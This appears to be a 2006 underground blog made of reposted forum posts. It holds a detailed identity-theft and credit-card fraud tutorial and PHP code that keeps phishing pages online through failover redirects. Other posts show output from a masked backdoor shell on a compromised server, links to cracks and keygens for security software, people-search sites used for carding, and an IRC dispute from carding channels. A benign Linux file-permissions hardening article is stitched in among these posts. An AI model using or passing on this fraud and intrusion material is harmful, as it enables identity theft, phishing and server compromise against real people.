Sunday, April 30, 2006

Portable 2006

Code:
http://www.megaupload.com/?d=A7AYVISP
Contains many nice portable programs, some in Spanish (like Winamp, Opera and many, many more).
Download it, you won't regret it.

http://www.meebo.com/

I really like this one

Quote:
http://www.meebo.com/


check it and u'll see

these im clients are included

AIM
ICQ
Yahoo! Messenger
Jabber
GTalk
MSN


Ps: the site has a long loading time before

List Code Ssn...56k Xpirence.

Below is the list of SSN area codes by state:


001-003 NH 400-407 KY 530 NV
004-007 ME 408-415 TN 531-539 WA
008-009 VT 416-424 AL 540-544 OR
010-034 MA 425-428 MS 545-573 CA
035-039 RI 429-432 AR 574 AK
040-049 CT 433-439 LA 575-576 HI
050-134 NY 440-448 OK 577-579 DC
135-158 NJ 449-467 TX 580 VI Virgin Islands
159-211 PA 468-477 MN 581-584 PR Puerto Rico
212-220 MD 478-485 IA 585 NM
221-222 DE 486-500 MO 586 PI Pacific Islands*
223-231 VA 501-502 ND 587-588 MS
232-236 WV 503-504 SD 589-595 FL
237-246 NC 505-508 NE 596-599 PR Puerto Rico
247-251 SC 509-515 KS 600-601 AZ
252-260 GA 516-517 MT 602-626 CA
261-267 FL 518-519 ID 627-645 TX
268-302 OH 520 WY 646-647 UT
303-317 IN 521-524 CO 648-649 NM
318-361 IL 525 NM *Guam, American Samoa,
362-386 MI 526-527 AZ Philippine Islands,
387-399 WI 528-529 UT Northern Mariana Islands

If you want to check your SSN code,
please check on this site:

https://www.ssnvalidator.com/pages/search.aspx <-----just click


I hope this helps you solve the problem of looking up an SSN.



Friday, April 28, 2006

Hacks From Pax: Linux File & Directory Permissions Mistakes

Source: Pax Dickinson - Posted by: Pax Dickinson
Date: Monday, 27 June 2005
Greetings, gentle reader, and welcome to linuxsecurity.com and our new recurring series of articles on security-related mistakes and how to avoid them. I'm your host, Pax Dickinson, and today we'll be reviewing basic Linux file and directory permissions and how to avoid some common pitfalls in their use, in this episode of Hacks From Pax.

One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of Unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com.

I've witnessed systems administrators whose response to a user complaining about being denied access to a given file is to chmod 777 the file (or entire directory tree) in question. This is an absolutely disastrous security practice: the administrator has just granted write access to the file to any user on the system. Any compromised service will allow an attacker to modify the file, which could result in further access depending on the file in question. For example, an attacker gaining write access to a script that is occasionally run by root can parlay this seemingly minor security hole into full root access for himself.

* Never make files world-writable. Most files do not need to be world readable either.

* You can search for world-writable files under your current directory by issuing the following command:

find . -perm -2 -print

A related mistake is in the misuse of suid root binaries. These are programs which can be launched by a user but run with all the privileges of root. These programs are needed to perform tasks such as changing a user's password, since that requires a write to the system's password file which normally cannot be modified by anyone but root. A flaw that allows an attacker to gain a shell prompt in such a program can give an attacker root access to the system. These binaries should be carefully limited and must be kept up to date with appropriate security patches to minimize their risk. A common backdoor installed by successful attackers is a copy of /bin/sh set suid root. This can be run by any user on the system, without a password, and will result in full root access.

Suid root bits should never be set on a shell script, as they are impossible to make secure. In fact, because of their insecurity, modern versions of Linux do not allow their use and will not respect the suid or sgid bits on shell scripts.

* Don't try to make shell scripts suid root. If you must, investigate suidperl, which is safer but still should be used carefully and only when absolutely necessary.

* You can search your system for suid and sgid files by issuing the following command:

find / -type f -perm /6000 -ls

A close eye should also be kept on the file permissions within the /dev directory. Improper permissions here can allow users to read or write directly to hardware devices such as hard disks and network interfaces. Most devices should only be writable by root, and readable only by the group they belong to, with the exception of terminal devices (/dev/tty and /dev/pty), /dev/null and /dev/zero. Generally device files only exist within the /dev directory, but this is not required. An attacker may attempt to replicate a device file outside of this directory in order to gain access to otherwise protected data.

* You can search the /dev directory for world writable files by issuing the following command:

find /dev -perm -2 -print

* You can locate all device files on your system by issuing this command:

find / \( -type b -o -type c -o -type s -o -type p \) -ls

As you can see, the find command is extremely useful for keeping an eye on the file permissions of your system. A script that runs several find commands can be launched by cron periodically to monitor your file permissions. Combining this with an intrusion detection system, discussed later in this series of articles, will help you both implement and maintain a high security environment. It may be a cliche to say this, but security truly is a process and absolutely requires an ongoing commitment.
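As an added example (not part of the original article), here is one way to wrap the find checks above in a script that cron can run, reporting only findings that are new relative to a stored baseline. The script name, function names and the paths in the crontab comment are assumptions.

```shell
#!/bin/sh
# perm_audit.sh (hypothetical name): report permission findings that are new
# since a stored baseline, so a cron run stays silent until something changes.
# Usage: perm_audit.sh ROOT BASELINE_FILE
# Example crontab entry (paths are assumptions; cron mails any output):
#   15 3 * * * /usr/local/sbin/perm_audit.sh / /var/lib/perm_audit/baseline

# World-writable files and directories under $1. Symlinks (always mode 777)
# and sticky directories such as /tmp are skipped to cut false positives.
list_world_writable() {
    find "$1" -xdev ! -type l -perm -0002 \
        ! \( -type d -perm -1000 \) -print 2>/dev/null
}

# Regular files with the suid or sgid bit set.
list_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Block/character devices, sockets and FIFOs. -xdev keeps find on one
# filesystem, so where /dev is its own mount a scan of / does not descend
# into it and any hit is a special file outside /dev.
list_special_files() {
    find "$1" -xdev \( -type b -o -type c -o -type s -o -type p \) \
        -print 2>/dev/null
}

# One "class path" line per finding, sorted so snapshots can be compared.
snapshot() {
    {
        list_world_writable "$1" | sed 's/^/world-writable /'
        list_suid_sgid "$1"      | sed 's/^/suid-sgid /'
        list_special_files "$1"  | sed 's/^/special-file /'
    } | LC_ALL=C sort
}

# Lines present in the current snapshot ($2) but not in the baseline ($1).
new_findings() {
    LC_ALL=C comm -13 "$1" "$2"
}

# First run records the baseline and returns 0. Later runs print findings
# absent from the baseline and return 1, or return 0 silently if none.
# The baseline is never rewritten here: after reviewing a legitimate change,
# delete the baseline file so the next run records it again. Keep the
# baseline writable by root only.
run_audit() {
    audit_root=$1
    audit_baseline=$2
    audit_current=$(mktemp) || return 2
    snapshot "$audit_root" > "$audit_current"
    if [ ! -f "$audit_baseline" ]; then
        mv "$audit_current" "$audit_baseline"
        return 0
    fi
    audit_fresh=$(new_findings "$audit_baseline" "$audit_current")
    rm -f "$audit_current"
    [ -z "$audit_fresh" ] && return 0
    printf '%s\n' "$audit_fresh"
    return 1
}

# Run only when invoked with both arguments.
if [ "$#" -eq 2 ]; then
    run_audit "$1" "$2"
    exit $?
fi
```
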

Stay secure, and I'll see you soon, in the next episode of Hacks From Pax!
--
Pax Dickinson has over ten years of experience in systems administration and software development on a wide variety of hardware and software platforms. He is currently employed by Guardian Digital as a systems programmer where he develops and implements security solutions using EnGarde Secure Linux. His experience includes UNIX and Windows systems engineering and support at Prudential Insurance, Guardian Life Insurance, Philips Electronics and a wide variety of small business consulting roles.

To anybody who wants to become a web developer/designer

This could help u a bit on your way imho

Read up:

http://www.w3schools.com/html/default.asp
http://www.w3schools.com/xhtml/default.asp
http://www.w3schools.com/css/default.asp
http://www.w3schools.com/js/default.asp
http://www.w3schools.com/php/default.asp
http://www.w3schools.com/sql/default.asp
http://www.w3schools.com/ajax/default.asp
http://www.w3schools.com/htmldom/default.asp

Read them in order to master the things that make our websites so great.

Generating "FAKE" traffic

Hi guys, I am lately very much into affiliates and I am also doing pretty good with some sites and Webclicker; however, the biggest and best sites in my opinion don't work. I just can't generate any hits to my referral pages. Any idea what I could do? What is the problem? Has anyone had the same experience? I hope you guys can give me some tips on how to get unique hits to my pages; it is really important for me!

is there maybe any better prog than webclicker(also tried I-FAKER but same results)??

THANKS IN ADVANCE FOR YOUR HELP

PEACE

Try these autosurfers (they're free, so there's no risk):
http://www.autosurf.cc/p/index.php?uid=w0rd
and
http://www.klick-banner-tausch.de/au...x.php?uid=w0rd
You get free credits when you start (2500 and 750 for the second one) so you can just keep resigning up or just surf

try www.gr8traffic.com
they send real traffic but not free

w0rd how can i use http://www.klick-banner-tausch.de/au...x.php?uid=w0rd

and like how many hits can i get daily from there

cheers

Thursday, April 27, 2006

Boleto.

Date of Birth or Background search

I know many websites where I can get BGs and DOBs, but I'm wasting a lot of CCs when I want to find a lot of DOBs.

For example:

With one CC I can get unlimited background reports from peoplefinders.com, but not with DOB; if I want them with DOB, I will waste like 1 CC for 2-3 DOB finds. I hope you get my idea.

The point is.. anyone know a good website from where I can easily get DOB? I can get background reports but I need DOB

If u know any other website beside these, please mention them! Thanks!

www.peoplefinders.com
www.zabasearch.com
www.intellius.com
www.privateeye.com

Security Utilities.

*Avast! Antivirus 4.6.774 Professional http://files.avast.com/iavs4pro/setupengpro.exe

37.
GData AntiVirusKit 2006
http://www14.enfull.com/GData.AntiVirusKit.exe

38.
*AVG Anti-Virus Professional 7.1.375 Build 716 http://download.grisoft.cz/softw/70/filedir/inst/avg71f_375a716.exe

39.
*BitDefender 9 Professional Plus http://download.bitdefender.com/resources/files/Download/en/bitdefender_prof_v9.exe

40.
*BitDefender 9 Internet Security http://www.bitdefender.com/site/Download/downloadFile/367/EN/bitdefender_isecurity_v9.exe

41.
*CA eTrust EZ Antivirus 2005 7.1
ftp://ftp.ca.com/priv/trial/eav/eAV71Trial/eAV71eng.exe

42.
*Dr.Web 4.33.1.12292
ftp://ftp.drweb.com/pub/drweb/windows/drweb-433-win-en.exe

43.
*F-Prot Antivirus 3.16f
ftp://ftp.f-prot.com/pub/windows/fp-win_trial.exe

44.
*F-Secure Internet Security 2006
http://download.f-secure.com/estore/fs2006f.exe

45.
*Kaspersky Antivirus Personal Pro 5.0.388
http://d-eu-1h.kaspersky-labs.com/products/release/english/homeuser/kavpersonalpro/kav5.0.388_personalproen.exe

46.
*Kaspersky Personal Security Suite 1.1.53
http://downloads1.kaspersky-labs.com/products/release/english/homeuser/securitysuite/ks1.1.53_securitysuiteen.exe

47.
*McAfee VirusScan 10.0.27 Pro
http://www2.fixdown.com/soft/3709.asp?free=sdtel-downs

48.
*McAfee Internet Security 8.0.113.3
http://www2.fixdown.com/soft/23379.asp?free=sdtel-downs

49.
*NOD32 AntiVirus v2.51.20
http://u4.eset.com/eval/win/v2/nentenst.exe

50.
*Panda Titanium Antivirus Antispyware 2006 5.01.02
http://www18.enfull.com/titan2006.exe

51.
*Panda Platinum Internet Security 2006 10.01.02 http://www18.enfull.com/platis2006.exe

52.
*Trend Micro PC-Cillin Internet Security 2006 http://www.trendmicro.com/ftp/products/pccillin/pcc_14_win_en_us_1341.exe

53.
*ZoneAlarm® Antivirus 6.1.737
http://download.zonelabs.com/bin/free/1038_zl/zaAvSetup_61_737_000_en.exe

54.
*ZoneAlarm® Internet Security Suite
http://download.zonelabs.com/bin/free/1038_zl/zaSuiteSetup_61_737_000_en.exe

55.
*ZoneAlarm® Pro 6.1.737
http://download.zonelabs.com/bin/free/1038_zl/zapSetup_61_737_000_en.exe

56.
*Norton 2006 Products links
http://rapidshare.de/files/10754056/Norton2006links.txt.html

57.
*Agnitum Outpost Firewall Pro 3.5.641.458
http://dl2.agnitum.com/OutpostProInstall.exe

58.
*eTrust EZ Personal Firewall v5.5.114.000
http://tinyurl.com/8js7x

59.
*Kaspersky Antihacker 1.8.180
http://d-ru-1h.kaspersky-labs.com/products/release/english/homeuser/securitysuite/ks1.1.53_securitysuiteen.exe

60.
*Kerio WinRoute Firewall 6.1.4 Build 1044 http://download.kerio.com/dwn/kwf/kerio-kwf-6.1.4-1044-win.exe

61.
*Lavasoft Personal Firewall v1.0.543.5722
http://down.9down.com/software/Lavasoft.Personal.Firewall.v1.0.543.5722-DVT.rar

62.
*McAfee Personal Firewall Plus v7.1.113
http://www2.fixdown.com/soft/3565.asp?free=sdtel-downs

63.
*Webroot Desktop Firewall 1.3
http://sales.webroot.com/downloads/registered/links/dfsetup1_1841609629.exe

64.
*Sygate Personal Firewall Pro 5.6.2808 http://cdrom.wip.digitalriver.com/pub/bws/bws_49/pspf.msi

65.
*Ashampoo Antispyware 1.02
http://download17.ashampoo.com/m/ashampoo_antispyware102_sm.exe

66.
*eTrust PestPatrol Anti Spyware v5.0.2.3 http://www14.enfull.com/PestPatrol.exe

67.
*Lavasoft AdAware Professional 1.06 http://www.lavasoft.de/auth/pjJacqRXrkUs/bUacgQXUfZUS/aawsepro.exe

68.
*SpyStopper Pro 4.40
http://www.itcompany.com/ssp.exe

69.
*WinPatrolPlus 9.8.1.0
http://www.winpatrol.com/wpsetup.exe

70.
*Spyware Doctor 3.5.1.498
http://www.pctools.com/downloads/sdsetup.exe

71.
*Webroot Spysweeper 4.5.9.709 http://sales.webroot.com/downloads/registered/links/sspsetup1_768375.exe

72.
*McAfee Antispyware 2.1.112
http://www14.enfull.com/McAfee.AntiSpyware.exe

73.McAfee Spamkiller 7.0.23
http://www2.fixdown.com/soft/2250.asp?free=cqoltel-downs

74.
*Steganos Antispyware 2006
ftp://file.steganos.com/software/saspy2006int.exe

75.
*Spy Emergency 2005 2.0.320
http://www.spy-emergency.com/download/se-setup.exe

76.
*TrendMicro Antispyware 3.0 http://www.trendmicro.com/ftp/products/tmas/tmasv30-us.exe

77.
*XoftSpy 4.22.012
http://paretologic.com/downloads/XoftSpy_setup.exe

78.
*ZoneAlarm® Anti-Spyware 6.1.737 http://download.zonelabs.com/bin/free/1038_zl/zaasSetup_61_737_000_en.exe



PC Security keycracks
http://www.megaupload.com/?d=7WEVQQOC
http://rapidshare.de/files/10816544/PC_Security_keycracks.rar.html

Addtional cracks
Spyware Doctor 3.5.1.498 crack
http://rapidshare.de/files/13611855/SD_3.5.1.498crack.rar.html

Ashampoo Antispyware keygen
http://rapidshare.de/files/13911394/AAkeygen.rar.html

Spy Stopper Pro 4.40 crack
http://rapidshare.de/files/11484596/SpyStopper.Pro.v4.40_crack.rar.html

BitDefender 9 Internet Security keygens

http://rapidshare.de/files/13294414/BDIS9c.rar.html

Serials for Antiviruskit 2006:

Name: fischer2815 Serial:7j1n1e

Name: alfaisal Serial:84C5K8


Sorry, I put all the info without code for the website.

Outpost Firewall.

The latest version of Outpost Firewall Pro is even more powerful and easy to use than its predecessors.

Firewall configurations can now be created and updated automatically on user acceptance, while the actual configuration of the firewall is handled remotely in the background by Agnitum security professionals.

The anti-spyware plug-in now ensures that vulnerable areas of the PC are constantly monitored for possible spyware activity. And the logging system is now more intuitive, customizable, and easy to use.

Let’s see in detail what’s been added.

Automatically generate and apply configurations
With this version of Outpost, Agnitum introduces ImproveNet. ImproveNet is a network community that brings Outpost users and Agnitum engineers together to optionally share configurations and enable everyone to benefit from universally-applicable Internet access security rules. By participating in the ImproveNet service, users can adjust their application access rules to protect against the latest threats. These settings are created, transferred and applied automatically if this feature is enabled, so that users no longer need to worry about how to respond to the next action prompt window – because ImproveNet adjustments mean that the window won’t appear in the first place!

The principle behind the ImproveNet service lies in security experts evaluating the preset access rules in use by the community of Outpost Firewall Pro users. After the rule is checked for validity and approved, it is automatically distributed to all other users through the Agnitum Update tool. Because new rules are created and processed on a daily basis, users will have a continuously updated set of access rules for the majority of existing Internet-enabled programs, sparing themselves the need to manually create their own rules and removing the possibility of errors in rule structure and application.

Smart spyware sensor
Spyware remains a serious threat, and smart but not overly restrictive protection should always be in place. That’s why we decided to incorporate our spyware sensor into Outpost’s active connections monitor. Here’s how it works: when a new application requests network access for the first time, it is automatically checked for spyware. In this way, no malware can cause damage and computer resources are kept at optimal levels in those instances when continuous spyware protection is not needed – for example, if the computer is used to play a demanding PC game.

Flexible logging system
Outpost’s improved logging system now uses fewer system resources and provides clearer logs. The program can now log specific application activities by defining log exclusions for a particular Internet or network activity. The logging system includes optimized default settings, with disabled logging for specific rules to allow or deny a connection. Advanced users will appreciate the flexibility of being able to create custom logging exclusions for peer-to-peer or NetBIOS communications, which are known to generate significant number of log records.

All the above improvements have been implemented in furtherance of Agnitum’s mission – to ensure that the Internet is a safe place for everyone without imposing unnecessary or cumbersome restrictions on the user.

Release date: April 20, 2006
Version: 3.51 (748.462)

Following is a list of new features:

o New flags in outpost.ini to control rules auto update settings

The following issues are fixed (only significant ones are listed):
o New presets for system rules and basic applications
o Outpost Plug-in SDK updated
o Third-party plug-ins updated to be compatible with Outpost 3.51
o Rules Wizard prompt was displayed too slowly
o Interface and localization issues
o Sometimes CPU load reached 100 % on Win98
o Some Anti-Spyware plug-in issues
o Some presets issues
o Besides, a lot of stability and usability improvements are performed.

Homepage:
http://www.agnitum.com/products/outpost/index.php


Application + Key File
http://rapidshare.de/files/18497250/OPF.351._748.462_.rar.html
or
http://www.sendspace.com/file/x9f98a

Microsoft "Staining" Products

Better not download the new Genuine Update...
Quote:
http://star-techcentral.com/tech/story.asp?file=/2006/4/25/prodit/14029720&sec=prodit

HYIP - E-Gold Games

http://www12.megaupload.com/files/b47b152b45c63fe6ad7a4903c1f4b5f5/HYIP%20-%20E-Gold%20Games.zip

Hyip stat

http://www18.megaupload.com/files/9ca991ed595432e45c59f62c3b85bc61/HYIPStat.rar

Ebay mail extractor

I don't know if it works now; I used it half a year ago, but it was still working.
http://www07.megaupload.com/files/11f1413a87e0485e54f602d866e3bb8b/e-mail%20extractor.rar

Automatic replacement.

OK guys, for example I have the following links:

http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???


How can I automatically replace the ??? with the numbers from 1 to 5?
You would say, why do it automatically fill it out yourself, but we are talking about 20000 links here... Any ideas?

PHP CODE
<?php
for ($i = 1; $i <= 20000; $i++) {
    echo "http://www.domain.com/forums/sendmessage.php?do=mailmember&u=" . $i . "\n";
}
?>

Wednesday, April 26, 2006

Deadbeat...

Session Start: Wed Apr 26 11:38:04 2006
Session Ident: Dead_Fish
[11:38:06] hey Dead_Fish
[11:38:10] where's my money, you deadbeat?
[11:38:10] son of a bitch
[11:38:14] /Whois de: Dead_Fish [identificado]
[11:38:14] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:38:14] Nome:....... Dead
[11:38:14] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:38:14] Canais:..... #full @#Priv8 @#bankers #cardding +#ATH #BB
[11:38:14] Inativo:.... 19s
[11:38:14] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:38:14] Fim do /Whois de: Dead_Fish
[11:38:14] go ahead
[11:38:16] do I know you?
[11:38:20] cef_na_mao
[11:38:23] ¬¬
[11:38:24] where is it, huh?
[11:38:27] man, come on
[11:38:27] ugh
[11:38:32] after all the times you said you weren't a deadbeat
[11:38:33] :/
[11:38:40] I trusted you, man
[11:38:51] /Whois de: Dead_Fish [identificado]
[11:38:51] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:38:51] Nome:....... Dead
[11:38:51] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:38:51] Canais:..... #full @#Priv8 @#bankers #cardding +#ATH #BB
[11:38:51] Inativo:.... 3s
[11:38:51] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:38:51] Fim do /Whois de: Dead_Fish
[11:38:58] huh? how is this going to go? Dead_Fish
[11:39:05] Cancelled
[11:39:09] I got stiffed by that son of a bitch
[11:39:11] ;(
[11:39:14] he didn't send my share either
[11:39:14] yeah man
[11:39:15] =~~
[11:39:18] I have nothing to do with that
[11:39:22] the deal I made was with you
[11:39:22] ok
[11:39:23] :)
[11:39:23] come on .
[11:39:26] I kept calling you
[11:39:30] yeah, and my money
[11:39:32] and you didn't pick up
[11:39:33] when are you going to send it?
[11:39:40] when I come up with it.
[11:39:41] no worries.
[11:39:43] -NickServ- Ultimo Horario visto: 26 Abr 10:39:30 2006 EDT
[11:39:44] don't worry
[11:39:49] how much will you send me
[11:39:51] I want to know
[11:39:52] your money isn't lost
[11:39:56] your money is guaranteed
[11:40:02] how much was the deal?
[11:40:02] I'm giving you until tomorrow
[11:40:03] ;)
[11:40:06] 470
[11:40:27] tomorrow?
[11:40:29] no way, man
[11:40:32] when I come up with it, I'll send it.
[11:40:42] when you come up with it?
[11:40:46] what kind of talk is that, man
[11:40:54] figure it out... I want it by Friday at the latest
[11:40:54] ugh
[11:40:55] I'm warning you
[11:40:58] my friend
[11:41:00] it's already been weeks
[11:41:05] that's just talk from you
[11:41:09] deadbeat talk
[11:42:14] x7x Dead_Fish@#full!expulso por D-P-F: Requested
[11:42:32] /Whois de: Dead_Fish [identificado]
[11:42:32] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:42:32] Nome:....... Dead
[11:42:32] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:42:32] Canais:..... @#Priv8 @#bankers #cardding +#ATH #BB
[11:42:32] Inativo:.... 0s
[11:42:32] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:42:32] Fim do /Whois de: Dead_Fish
[11:43:01] /Whois de: Dead_Fish [identificado]
[11:43:01] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:43:01] Nome:....... Dead
[11:43:01] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:43:01] Canais:..... @#Priv8 @#bankers #cardding +#ATH #BB
[11:43:01] Inativo:.... 3s
[11:43:01] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:43:01] Fim do /Whois de: Dead_Fish
[11:43:13] /Whois de: Dead_Fish [identificado]
[11:43:13] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:43:13] Nome:....... Dead
[11:43:13] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:43:13] Canais:..... @#Priv8 @#bankers #cardding +#ATH #BB
[11:43:13] Inativo:.... 0s
[11:43:13] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:43:13] Fim do /Whois de: Dead_Fish
[11:45:13] you deadbeat
[11:49:40] man, you're shameless
[11:49:41] ffs

Tuesday, April 25, 2006

hackertools

http://www.hackertools.dl.am/

lok-crew

http://www.lok-crew.de/

Cell Phone Tracking

http://www.fonefinder.com/Introduction.html
http://world-tracker.com/

D.O,M

Monday, April 24, 2006

Funny.

http://www.youtube.com/watch?v=C8rjr4jmWd0&search=humor

IDTheft Tutorial

Identity Theft:

Disclaimer: This is for informational purposes only. The author takes no responsibility regarding how other people use this information. Do not attempt the following because its illegal and wrong and bad….blah blah blah….


Ok, so you have a drop and wanna pull a good amount of money through it. Heres some good ideas.

You have information on somebody, ss, dob, and prior addresses are a must. Also highly recommended are credit reports and dl number. You can get around the dl# without problems. But if you don’t have a credit report, you should at least know one bank or credit card that the mark uses. (this comes in handy if the credit department calls to verify your application.)

OK…
1. Get a prepaid/VOIP phone number to be used as a business number.
2. Get a primary phone: One of the following is ideal: A landline with the local utility company if your drop is an apartment or a cell phone under the marks name. If you’re getting a cell you’ll need an ID, but you may get away with calling a provider and giving them fake DL# to activate a phone u bought previously. If these arnt an option just get another prepaid phone. Either way make sure the area code matches the drops location.

-At the end of the month the credit bureaus update their databases (so I heard). You’re going to want the marks address changed to your drop on their files. This is why you want a cellular plan under his name, plus it actually saves you money as opposed to buying a prepaid with minutes. If you can’t get a cell/landline, you can get a prepaid card under marks name (one that reports to credit bureaus). Pay with a money order. This is a must if you don’t have a credit report.

3. Get credit… 2 options….call credit companies and get mail in applications or call the applications phone number directly. Be sure to mention that you recently moved and give them the prior address of the mark.

- If your mark is within driving distance of yourself it would be advantageous to dumpster dive/ check his mail. If you can give them the numbers of a preapproved application, you’re golden. Also, this may give you a clue to what cell phone provider he is using, what banks he has, and possibly who is his employer.
- Although more risky, you may use one drop for more than one mark. However, do not apply to the same banking institutions under different names.
- I have generally found AEX and Discover to be more difficult as they sometimes send a letter to the marks prior address informing him of the recent application. (if anyone has more banks to avoid/ hit up/ or other useful facts….post them NOW)
- After 3 credit inquiries into one bureau your chances of getting approval from a following application drops substantially.
- Theoretical max applications per person is 9, 3 inquiries into each of the 3 bureaus. You can use this sight to help you determine what banks use which CRA….but it’s not always 100% and it sucks going through this list. http://creditboards.com/forums/index.php?showtopic=37366
- If you insist on applying online, be sure that you buy some email addresses with personalized domain names. Use proxies as always, but also make sure that the IP is geographically close to drop. AOL may work too.


4. Stay by the phones with all information at hand, they call anywhere from same day to a week later (usually within 2-3 days though). They have been known to ask: prior addresses 90%, DOB, SS, current address, schools, other banks/cards and their limits, driving directions to addresses, Dl#s, loan/mortgage information, Jr./Sr., relatives + their phone #s, employer and employer’s address (you are best off using a real business name and address and give them the number of your 2nd cell phone for your current employer).
- Practice asking yourself these questions, so when you get a random phone call you will be ready to answer without hesitation.
- If you get prepaid phones…I have found that they don’t do call forwarding….so you have to sit there with a bunch of cells. It is probably best to get all the phone lines to forward to one phone so you arnt confined to your home for a week.

5. Get your applications, it is good to check for approval before going to your drop…but not all banks allow this. You may need to send them approving documents, (use Photoshop). Activate the cards as soon as you get them and make several purchases under 300$. Be sure to call with the phone that you used in the application as primary number.

6. Now to turn plastic into paper. There are countless ways of doing this, but I’ll describe two I have found to be practical and profitable.
- Instore/ order goods to your drop. If your drop is an apartment and you are looking to deliver goods that require signing, you can get a MBE box and do a COB on your card. This will be easy as you have the MMN (that you made up…this isn’t checked against any database) and all other relevant info. Also wait for the pin to arrive within a week or so and use ATMs. But note that there is usually a daily limit, and meeting that limit day after day after getting your card will likely get your card shut down.
- Wouldn’t recommend WU unless you have a lot of info on mark as well as good phone skills.
- It takes money to make money. If you have set up a sufficient amount of cards and bank accounts you can do the following. I have found this to be the most profitable for a given period of time. $/T. Simply use the convenience checks that arrive shortly after the cards do. Mail them to the bank accounts you set up and ATM the money out. You would want to set up either 2 CC for each Bank acc, or go 50/50. While you’re doing this you should have applied for a merchant account on the bank accounts. This way when you use up all the “cash advance” limits on the cards…you can continue to pull the rest of the money out VIA the merchant accounts. When you apply for the account, be sure to let them know your estimated volume (fewer orders, large deposits, [construction, selling motorcycles, organs, whatever]). Then use the cards to deposit funds into the merchant accounts. When doing this though, do not allow all your cards to be used with any particular merchant account. You don’t want all your cards to be linked together. The FBI is estimated to begin investigations at 50K plus and gang related crime. If you do not allow all your crime to be linked together, you will be better off. This goes for cell phones, drops, email addies.

7. When the cards have no money, you should have made at least 1000% profit on your initial (500ish$) investment in no time. At this point you have some good merchant accounts hopefully still active. Just buy some cc#s and see how much more $ you can pull through the accounts. You can also do a COB balance transfer to these bank accounts. Rip off some people on eBay with Paypal or checks (Least recommended; least profitable, pisses LE off, gets more people actively involved in your fraud.) Apply for loans, cash loans, or cashout of anything. Your options are limited only by your imagination once you’re at this stage. But do not forget that the most valuable thing you possess is freedom and that greed fogs the mind of logical thought. Don’t get greedy and don’t brag to your friends, wives, mistresses, girlfriends, dogs.

None of this information is new or revolutionary. It is a basic outline of one way money can be made illegally. Many details have been omitted; if you have questions post them or PM me. Also if you have something to add to this please do….what banks are good?...what merchant providers?....how aggressively to pull $ from cards?....good techniques/ tricks to better T/$ ratio…..
trial and error is a bitch…. share your experiences so we can keep the flame burning.
-“Education is not filling a bucket, but lighting a fire.” William Butler Yeats
__________________
-Take calculated risks. That is quite different from being rash. -General George S. Patton

-Life is a tragedy for those who feel, and a comedy for those who think. -La Bruyere

Anzac.

Scams 2006...lol

http://membres.lycos.fr/irc0074u/

Country Codes.

http://ftp.ics.uci.edu/pub/websoft/wwwstat/country-codes.txt

m0rtix.

,--. | o
,-.-.| |,---.|--- .. ,
| | || || | | ><
` ' '`--'` `---'`' `

PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 20116
Shell on: 9997 User: apache@ UID: 48
Name: /sbin/syslogd (Masked in PS! ) v: = Linux notos.maestrodigital.net 2.6.14-1.1656_FC4


Rootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !

Sunday, April 23, 2006

A short coding tip on how-to keep your scams alive much much longer

Create page for redirect and insert this code:

function scam_exists($strURL) {
$data = file_get_contents($strURL);
return $data;
}

$conf_word = "exists"; // confirmation word for checker to see if the scam is still alive

$url1 = "hxxp://www.scam1.com/?session=31337"; // first scam url
$url2 = "hxxp://www.scam2.com/?session=31337"; // second scam url
$url3 = "hxxp://www.scam3.com/?session=31337"; // third scam url (actually you can add as much as you like, but don't forget to add equal number of "elseif"

if(scam_exists($url1) == $conf_word) {
$url1 = str_replace("?session=31337","", $url1); // str_replace("?session=31337","YOU_CAN_PUT_HERE_WHATEVER_YOU_NEED_TO", $url1);
header("Location: $url1");
}

elseif(scam_exists($url2) == $conf_word) {
$url2 = str_replace("?session=31337","", $url2);
header("Location: $url2");
}

elseif(scam_exists($url3) == $conf_word) {
$url3 = str_replace("?session=31337","", $url3);
header("Location: $url3");
}

else {
@mail('your@email.com','Scams report','All your scams are offline'); // or send mail to you if all scams are offline
header("Location: hxxp://editme.com"); // any site where people should be redirected if all scams are offline
}
?>


Now in you scam page before all other code add:


$ses = "31337";
$session = $_GET['session'];
if($session == $ses) { echo "exists"; }
else {
?>


And add this in the end of your scam after all code:


}
?>


Now upload all scam pages and redirect page to separate places. In your spam add redirect page's url. It will check if your scams are responding to query and if any of them aren't online it will redirect to working scam.




Actually, this would be a little more efficient:


$scams = array('hxxp://www.scam1.com/index.php', // If it's a domain and not a request to a page
'hxxp://www.scam2.com/', // (e.g. index.php) add a slash (/) to the end.
'hxxp://www.scam3.com/');

foreach ($scams as $scam) {
if (file_get_contents($scam."?session=31337") == "exists") {
Header("Location:$scam"); exit;
}
}

@mail('your@email.com','Scam Report','Your scams are down!');
Header("Location:hxxp://www.backupurl.com/");
?>


And in your scam pages:

Code:





Number 2



if($_GET['session'] == 31337)
{
echo 'true';
exit;
}
